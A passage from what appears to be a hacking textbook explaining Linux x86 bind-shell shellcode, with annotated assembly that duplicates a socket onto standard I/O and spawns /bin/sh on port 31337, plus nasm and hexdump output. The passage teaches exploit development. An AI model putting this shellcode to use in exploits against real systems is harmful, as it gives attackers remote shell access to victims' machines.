Graphics Programs Reference
In-Depth Information
int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd.
dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.
The bind_port.s shellcode left off with the connected socket file descriptor
in EAX. The following instructions are added in the file bind_shell_beta.s to
duplicate this socket into the standard I/O file descriptors; then, the tiny_shell
instructions are called to execute a shell in the current process. The spawned
shell's standard input and output file descriptors will be the TCP connection,
allowing remote shell access.
New Instructions from bind_shell1.s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax ; Move socket FD in ebx.
push BYTE 0x3F ; dup2 syscall #63
pop eax
xor ecx, ecx ; ecx = 0 = standard input
int 0x80 ; dup(c, 0)
mov BYTE al, 0x3F ; dup2 syscall #63
inc ecx ; ecx = 1 = standard output
int 0x80 ; dup(c, 1)
mov BYTE al, 0x3F ; dup2 syscall #63
inc ecx ; ecx = 2 = standard error
int 0x80 ; dup(c, 2)
; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
push edx ; push some nulls for string termination.
push 0x68732f2f ; push "//sh" to the stack.
push 0x6e69622f ; push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.
push ecx ; push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
When this shellcode is assembled and used in an exploit, it will bind to
port 31337 and wait for an incoming connection. In the output below, grep
is used to quickly check for null bytes. At the end, the process hangs waiting
for a connection.
reader@hacking:~/booksrc $ nasm bind_shell_beta.s
reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 89 c6 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a |..jfXCRfhzifS..j|
00000020 10 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd |.QV.....fCCSV...|
